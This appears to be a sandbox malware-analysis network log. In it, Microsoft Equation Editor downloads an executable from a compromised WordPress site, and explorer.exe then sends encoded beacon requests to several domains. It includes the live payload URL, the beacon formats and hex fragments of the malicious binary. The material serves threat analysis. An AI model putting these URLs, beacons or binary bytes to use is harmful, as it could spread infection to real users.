                                        Nov 21, 2023 13:26:55.181051016 CET192.168.2.228.8.8.80xa59fStandard query (0)www.shucaimh.comA (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:27:15.067967892 CET192.168.2.228.8.8.80x575cStandard query (0)www.6061k.vipA (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:27:35.102672100 CET192.168.2.228.8.8.80xebecStandard query (0)www.xazeyu.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 21, 2023 13:25:54.755660057 CET8.8.8.8192.168.2.220x73d6No error (0)swamini.in103.224.247.210A (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:26:35.444792032 CET8.8.8.8192.168.2.220x622aName error (3)www.allamericanshuttlellc.comnonenoneA (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:26:55.291516066 CET8.8.8.8192.168.2.220xa59fNo error (0)www.shucaimh.com107.164.111.101A (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:27:15.167404890 CET8.8.8.8192.168.2.220x575cNo error (0)www.6061k.vip6061k.vipCNAME (Canonical name)IN (0x0001)false
                                        Nov 21, 2023 13:27:15.167404890 CET8.8.8.8192.168.2.220x575cNo error (0)6061k.vip3.33.130.190A (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:27:15.167404890 CET8.8.8.8192.168.2.220x575cNo error (0)6061k.vip15.197.148.33A (IP address)IN (0x0001)false
                                        Nov 21, 2023 13:27:35.330076933 CET8.8.8.8192.168.2.220xebecNo error (0)www.xazeyu.net103.150.181.71A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • swamini.in
                                        • www.shucaimh.com
                                        • www.6061k.vip
                                        • www.xazeyu.net

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2249161103.224.247.210801668C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        Nov 21, 2023 13:25:55.147417068 CET0OUTGET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: swamini.in
                                        Connection: Keep-Alive
                                        Nov 21, 2023 13:25:55.514156103 CET1INHTTP/1.1 301 Moved Permanently
                                        Content-Type: text/html; charset=UTF-8
                                        Location: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
                                        Server: Microsoft-IIS/8.5
                                        X-Powered-By: ASP.NET
                                        X-Powered-By-Plesk: PleskWin
                                        Strict-Transport-Security: max-age=15768000; includeSubDomains
                                        Date: Tue, 21 Nov 2023 12:25:52 GMT
                                        Content-Length: 194
                                        Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 73 77 61 6d 69 6e 69 2e 69 6e 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 77 70 72 2d 61 64 64 6f 6e 73 2f 66 6f 72 6d 73 2f 62 61 6c 6f 6b 61 72 61 74 32 2e 31 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe">here</a></body>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.2249165107.164.111.101801244C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 21, 2023 13:26:55.450467110 CET359OUTGET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1
                                        Host: www.shucaimh.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:26:56.648093939 CET361INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 21 Nov 2023 12:26:56 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Powered-By: PHP/5.4.41
                                        Data Raw: 62 64 65 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 7c 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 28 77 77 77 2e 73 68 75 63 61 69 6d 68 2e 63 6f 6d 29 e6 98 af e6 9c 80 e7 83 ad e9 97 a8 e7 9a 84 e5 a8 b1 e4 b9 90 e5 9c ba e6 89 80 e4 b9 8b e4 b8 80 2c e7 a7 89 e6 89 bf e4 bf 9d e8 af 81 e4 b8 80 e6 b5 81 e8 b4 a8 e9 87 8f 2c e4 bf 9d e6 8c 81 e4 b8 80 e7 ba a7 e4 bf a1 e8 aa 89 e7 9a 84 e7 bb 8f e8 90 a5 e7 90 86 e5 bf b5 2c e5 9d 9a e6 8c 81 e5 ae a2 e6 88 b7 e7 ac ac e4 b8 80 e7 9a 84 e5 8e 9f e5 88 99 e4 b8 ba e5 b9 bf e5 a4 a7 e5 ae a2 e6 88 b7 e6 8f 90 e4 be 9b e4 bc 98 e8 b4 a8 e7 9a 84 e6 9c 8d e5 8a a1 e3 80 82 22 3e 0d 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e e6 be b3 e9 97 a8 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 e5 9f 8e 39 37 32 38 7c e9 a6 96 e9 a1 b5 28 e6 ac a2 e8 bf 8e e6 82 a8 29 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 5f 63 73 73 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 5f 6a 73 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 65 61 73 79 75 69 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 5f 6a 73 2f 74 68 65 6d 65 73 2f 69 63 6f 6e 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 79 75 69 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 65 61 73 79 75 69 2d 6c 61 6e 67 2d 7a 68 5f 43 4e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a
                                        Data Ascii: bde<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><meta name="keywords" content="9728|"><meta name="description" content="9728(www.shucaimh.com),,,"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>9728|()</title><script src="/jquery.min.js" ></script><link href="/_css/error/error.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="/_js/themes/default/easyui.css" /><script type="text/javascript" src="/_js/jquery.min.js"></script><link rel="stylesheet" type="text/css" href="/_js/themes/icon.css" /><script type="text/javascript" src="/_js/jquery.easyui.min.js"></script><script type="text/javascript" src="/_js/easyui-lang-zh_CN.js"></script>
                                        Nov 21, 2023 13:26:56.648200989 CET362INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 5f 6a 73 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a
                                        Data Ascii: <script type="text/javascript" src="/_js/common.js"></script><script type="text/javascript" src="/_js/jquery.base64.js"></script></head><body><h1><a href="/" title='9728|()'>9728|
                                        Nov 21, 2023 13:26:56.648214102 CET363INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 63 6c 6f 73 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                        Data Ascii: window.top.close(); } </script> </div><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shucaimh.com.xml" target="_blank">XML </a> | <a href="/shu
                                        Nov 21, 2023 13:26:56.648225069 CET363INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.22491663.33.130.190801244C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 21, 2023 13:27:15.263664007 CET364OUTGET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1
                                        Host: www.6061k.vip
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:15.362652063 CET364INHTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Tue, 21 Nov 2023 12:27:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2aa-123"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.2249167103.150.181.71801244C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 21, 2023 13:27:36.955003023 CET365OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:41.824326038 CET365OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:51.543101072 CET365OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:10.996438980 CET366OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:30.511953115 CET366OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:49.980819941 CET366OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:29:28.871623993 CET367OUTGET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2249162103.224.247.2104431668C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        2023-11-21 12:25:56 UTC0OUTGET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Connection: Keep-Alive
                                        Host: swamini.in
                                        2023-11-21 12:25:57 UTC0INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Tue, 21 Nov 2023 10:13:50 GMT
                                        Accept-Ranges: bytes
                                        ETag: "7ee53f6c631cda1:0"
                                        Server: Microsoft-IIS/8.5
                                        X-Powered-By: ASP.NET
                                        X-Powered-By-Plesk: PleskWin
                                        Strict-Transport-Security: max-age=15768000; includeSubDomains
                                        Date: Tue, 21 Nov 2023 12:25:54 GMT
                                        Connection: close
                                        Content-Length: 345522
                                        2023-11-21 12:25:57 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@
                                        2023-11-21 12:25:57 UTC16INData Raw: 08 04 00 00 0f 85 d2 00 00 00 f6 05 59 3f 42 00 02 75 76 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 68 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 9b fc ff ff 3b c7 7c 53 8b c8 69 c9 18 04 00 00 8d 54 19 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 8a c6 ff ff a1 58 3f 42 00 33 c9 f7 d0 41 c7 45 0c 0f 04 00 00 c1 e8 08 23 c1 89 4d 10 89 45 14 39 7d f4 74 4e 8b 45 f4 81 78 08 6e fe ff ff 75 0e ff 70 5c 57 68 19 04 00 00 ff 75 fc ff d6 8b 45 f4 81 78 08 6a fe ff ff 75 28 83 78 0c 02 75 12 8b 40 5c 69 c0 18 04 00 00 8d 44 18 08 83 08 20 eb 10 8b 40 5c 69 c0 18 04 00 00 8d 5c 18 08 83 23 df 81 7d 0c 11 01 00 00 75 72 66 81 7d 10 f9 03 0f 85 48 02 00 00 8b 45 10 c1 e8 10 66 3d 01 00 0f 85 38 02
                                        Data Ascii: Y?Buv9EtMyuh39EQu;|SiTu@@tyPX?B3AE#ME9}tNExnup\WhuExju(xu@\iD @\i\#}urf}HEf=8
                                        2023-11-21 12:25:58 UTC32INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00
                                        Data Ascii:
                                        2023-11-21 12:25:58 UTC48INData Raw: 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii:
                                        2023-11-21 12:25:58 UTC64INData Raw: ee ce 9a 0c 90 09 7c 39 b1 7f 99 4b da fe 93 df 8a 39 fe de e3 7a 6a d4 98 6d 42 84 51 4f cb f7 4e 43 e9 e7 11 5e f6 01 90 a7 c6 d8 00 76 8b 2c e7 46 2f 28 71 18 e4 0c 63 e9 28 ee b0 65 e7 a6 c1 3f 4b c7 b2 5b 97 b3 da 98 e4 ec 6c 05 b8 13 97 76 80 7b 34 4e d7 c8 0d ef 50 bf 7c c6 80 fb 7c 4c 00 e7 f6 20 30 a1 ff 59 04 3c 11 3a eb b3 a8 92 d7 38 6a 90 55 bc ef bb 7e 9b 81 9d 9c 0e 59 26 ff 14 59 e4 ac 98 88 b6 a9 f8 36 b2 c4 7d 0b 0e c7 cd 62 97 ab 00 b4 0b b7 57 e1 1e 4d 43 14 c5 24 41 c8 0d f1 21 b8 e9 bd 4a 3d 14 48 ca 22 ab 2d 59 a6 5a 44 ad e7 ad f3 af 04 35 0c 69 07 cd 3f 9e 5c 38 74 40 6d e5 c9 27 58 ea 8f e6 61 0b cb 51 df 45 d1 fc c0 04 5d 1e e1 ed 09 75 a0 01 e8 62 cb e2 8d 19 49 a6 4e d5 5a cd e5 fa 88 da be c9 24 e9 c9 fc 0d e9 a1 1f 56 70 1b
                                        Data Ascii: |9K9zjmBQONC^v,F/(qc(e?K[lv{4NP||L 0Y<:8jU~Y&Y6}bWMC$A!J=H"-YZD5i?\8t@m'XaQE]ubINZ$Vp
                                        2023-11-21 12:25:58 UTC80INData Raw: 41 36 69 a3 b1 a0 c1 52 7a ca fb 46 46 90 ba 5d 28 cb 68 53 1c 2a 5a d0 00 7e f4 9c 36 d0 57 dd 61 c8 16 27 65 a7 8d c6 2b fa 69 43 9a 70 7f 4a 93 e0 14 d0 b5 58 f5 d0 73 3e bf e2 aa cd 13 c6 a9 6f 26 e2 76 32 85 9a ef 62 13 ba 58 b9 fc 0a 92 26 02 1b a5 b8 a7 49 33 ce e2 6e d2 74 72 13 c9 da 08 19 32 60 df b9 be 2e da 2f 8f 16 c2 d5 c0 45 cb 00 5d db d7 fd 22 6e f8 cb 90 18 63 c5 53 b4 93 db b1 c5 fa 30 57 2c 4c 84 c0 39 f6 72 27 74 d5 f4 b2 79 6c 64 9d c2 cf 5c b9 0b e3 53 89 b5 be 6c 35 dd 41 af 65 c6 41 e1 f6 e3 18 91 fa d0 d2 bf 39 39 1a 23 d5 83 dc 06 63 24 64 10 a3 08 6d cb 83 1a 58 9f cc 40 10 38 ae ab 5e 93 4e 2a 97 50 fb 10 56 59 ec eb 0d c0 c1 57 35 03 5b 86 73 2c 02 6c 41 bd a0 e1 b1 d9 43 37 a0 84 8e 5b ab 93 ad e0 46 07 dc ec 7e 1e 66 7e 7b
                                        Data Ascii: A6iRzFF](hS*Z~6Wa'e+iCpJXs>o&v2bX&I3ntr2`./E]"ncS0W,L9r'tyld\Sl5AeA99#c$dmX@8^N*PVYW5[s,lAC7[F~f~{
                                        2023-11-21 12:25:58 UTC96INData Raw: b0 93 7b e8 5a 0a 62 74 0a 98 c6 02 23 7e 5e 91 48 b4 65 90 b8 b7 89 3e 68 76 98 21 46 df 50 8d 26 fd 92 1a 28 5e d4 cc e0 99 93 c2 8b b5 b6 2d 21 b5 62 ac 56 c3 eb a5 34 07 3a e7 29 17 3e 09 75 31 d4 b8 b5 84 f5 44 d4 3d 1f f0 72 40 a8 8d b4 a9 84 09 41 aa 0a 33 ae ac 7b 10 58 cd 0a c9 7a 53 25 7b 50 2d c1 25 00 a0 1f b3 c3 45 92 b8 7b b9 c0 0d c5 2a f6 af e1 52 7f e3 6a 6b 91 36 ec 72 7e 1f 7b db 23 c1 a6 58 89 f1 8d c5 c5 db 34 15 f4 ca c8 bb 06 f1 48 e8 47 ca 2e b4 3a ff 5c e6 37 a7 47 2d 93 75 ab b5 10 c0 f8 80 f6 02 e0 e3 94 15 f4 1b cc 45 7f bc 13 21 af 00 83 5a f0 4f ea 63 a3 02 2b f4 ec 6c e8 d8 50 59 ce 82 65 f1 f5 4e a9 41 66 fc 80 33 38 a7 be c9 4c 02 a9 e7 dc 0e 41 09 70 e0 54 ba 0b d7 cc 80 36 be d0 d5 87 e7 47 92 fe f6 18 49 ea d7 5c f2 d9
                                        Data Ascii: {Zbt#~^He>hv!FP&(^-!bV4:)>u1D=r@A3{XzS%{P-%E{*Rjk6r~{#X4HG.:\7G-uE!ZOc+lPYeNAf38LApT6GI\
                                        2023-11-21 12:25:58 UTC112INData Raw: 0c 60 30 3d 50 21 b0 35 bc 83 27 f0 e5 e9 3a 07 18 d5 e5 76 c8 27 eb 62 56 d4 28 fe 65 59 4c a3 2b a7 60 37 40 82 d6 82 6a 96 fb 27 a5 62 ab 20 5a 77 51 67 f1 04 f6 7b 55 4d 86 37 ea b2 2c 89 0a 2b d5 84 fe 1f 20 cf c3 1f 67 72 56 cc a4 b6 66 1d 94 6f 9a 1b c8 4b 1a ce b5 3c e5 9b 57 bf 16 1f bd 36 41 c5 90 a1 d4 a7 6c cc d3 42 8e c4 3d 15 e0 64 49 d1 c7 3e 80 1a dd ce f4 4c 55 08 6c 75 03 5b c3 72 e2 38 47 75 3b 5c 7a 6e d7 74 9c d4 77 42 fd e3 e7 6f 35 16 9b 89 41 21 23 de 01 b2 dd 3c 04 3f f9 7a de c7 ca f4 4b 02 ac 34 1e 54 0a 74 62 cc 75 dd 77 31 02 b2 8d 6c 37 86 09 26 53 04 8d b4 62 e2 b3 7d fa 2e b2 22 4b 8e 48 42 fa bb a2 a1 47 bc 85 56 8f 29 b4 48 cb 13 66 87 f9 c9 6a 1a 90 26 06 8d f6 d3 81 23 ea 58 e2 bd 7c 3b ef 69 1a a6 56 ec 17 22 3d 15 2a
